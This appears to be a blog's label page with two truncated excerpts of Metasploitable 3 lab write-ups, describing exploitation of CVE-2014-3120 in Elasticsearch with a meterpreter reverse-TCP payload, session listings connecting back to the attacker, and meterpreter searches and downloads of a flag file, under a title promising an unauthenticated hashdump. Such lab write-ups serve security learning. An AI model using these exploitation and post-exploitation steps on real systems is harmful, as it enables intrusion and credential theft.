Posts

Showing posts with the label elasticsearch

Metasploitable 3 - Hashdump without Authentication

Image
Metasploitable 3 Getting a Hashdump without Authentication If you remember, in my Queen of Hearts post, I exploited vulnerability CVE-2014-3120 in Elasticsearch and sent a java/meterpreter/reverse_tcp payload. Going back to that session we can see the meterpreter commands available. msf exploit( script_mvel_rce ) > sessions Active sessions ===============   Id  Type                      Information                         Connection   --  ----                      -----------                         ----------   2   meterpreter java/windows  METASPLOITABLE3$ @ metasploitable3  10.23.10.200:4467 -> 10.20.10.23:49393 (10.20.10.23) msf exploit( script_mvel_rce ) > sessions 2 [*] Startin...

The King of Clubs

Image
Metasploitable 3 The King of Clubs From the meterpreter I found in the Elasticsearch vulnerability, I used the search command to look for files that start with king:  meterpreter > search -f king* Found 5 results...     C:\Windows\System32\kingofclubs.exe (824563 bytes)     C:\vagrant\resources\flags\kingofclubs.exe (824563 bytes)     C:\wamp\www\wordpress\wp-content\uploads\2016\09\king_of_damonds-150x150.png (46738 bytes)     C:\wamp\www\wordpress\wp-content\uploads\2016\09\king_of_damonds-214x300.png (130832 bytes)     C:\wamp\www\wordpress\wp-content\uploads\2016\09\king_of_damonds.png (585695 bytes) I downloaded the file: meterpreter > download kingofclubs.exe [*] downloading: kingofclubs.exe -> kingofclubs.exe [*] download   : kingofclubs.exe -> kingofclubs.exe I examine the file, as expected it’s a Windows executable, and 32bits.  root@ig...